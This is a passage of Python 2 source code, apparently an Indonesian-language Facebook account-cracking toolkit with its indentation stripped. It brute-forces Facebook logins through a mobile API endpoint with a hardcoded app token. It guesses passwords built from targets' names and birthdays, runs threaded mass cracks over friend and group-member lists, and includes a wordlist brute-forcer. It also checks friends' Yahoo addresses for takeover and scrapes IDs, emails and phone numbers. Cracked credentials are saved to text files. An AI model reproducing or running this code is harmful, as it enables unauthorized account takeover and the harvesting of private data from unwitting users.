print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
